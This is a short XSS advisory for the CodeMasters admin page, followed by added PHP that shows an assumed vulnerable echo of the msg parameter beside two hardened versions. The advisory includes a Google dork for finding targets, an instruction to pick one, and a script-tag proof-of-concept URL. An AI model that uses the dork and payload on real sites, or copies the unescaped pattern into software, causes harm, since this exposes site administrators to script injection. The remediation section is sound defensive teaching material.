|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: CodeMasters Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.codemasters-project.net/
|[+]
|[+] Google Dork: intext:"POWERED BY- CODE MASTERS"
|[+]
|[+] Tested on: Windows, Linux
|[+]
|[+] Date: 18 Dec. 2015
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search the dork, choose a target, and append "/Admin/index.php?msg=<script>alert('HACKED');</script>" to the URL
|[+] to see the vulnerability.
|--------------------------------------------------------------|
|[+] Examples :
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : Cloner-47
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
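
The advisory shows the msg parameter of /Admin/index.php being reflected into the page but gives no fix. The PHP below is an added example, not CodeMasters source code and not from the advisory author: it assumes the parameter is echoed unescaped and sets that pattern beside two hardened forms. All function names, the "notice" markup and the message codes are hypothetical.

```php
<?php
// Added example: assumed shape of the flaw, not CodeMasters source code.

// Vulnerable pattern (assumption): the msg query parameter is echoed as-is,
// so markup supplied in the URL becomes markup in the admin page.
function render_msg_vulnerable(array $query): string
{
    $msg = $query['msg'] ?? '';
    return '<div class="notice">' . $msg . '</div>';
}

// Hardened form 1: encode on output so the value is treated as text.
function render_msg_encoded(array $query): string
{
    $msg = $query['msg'] ?? '';
    if (!is_string($msg)) {           // ?msg[]=x arrives as an array
        $msg = '';
    }
    $safe = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="notice">' . $safe . '</div>';
}

// Hardened form 2: accept only known message codes, never free text.
const MESSAGES = [                    // hypothetical codes
    'saved'   => 'Record saved.',
    'deleted' => 'Record deleted.',
    'denied'  => 'Login failed.',
];

function render_msg_allowlisted(array $query): string
{
    $code = $query['msg'] ?? '';
    if (!is_string($code) || !array_key_exists($code, MESSAGES)) {
        return '';                    // unknown input renders nothing
    }
    return '<div class="notice">' . MESSAGES[$code] . '</div>';
}

// Constructed sample input mirroring the advisory's test string.
$query = ['msg' => "<script>alert('HACKED');</script>"];

echo render_msg_vulnerable($query), PHP_EOL;   // script tag reaches the browser
echo render_msg_encoded($query), PHP_EOL;      // angle brackets and quotes become entities
echo render_msg_allowlisted($query), PHP_EOL;  // empty: not a known code
echo render_msg_allowlisted(['msg' => 'saved']), PHP_EOL;
```

The allow-list form is the stronger of the two for status messages, since no request-supplied text reaches the page at all; output encoding remains necessary wherever free text must be displayed.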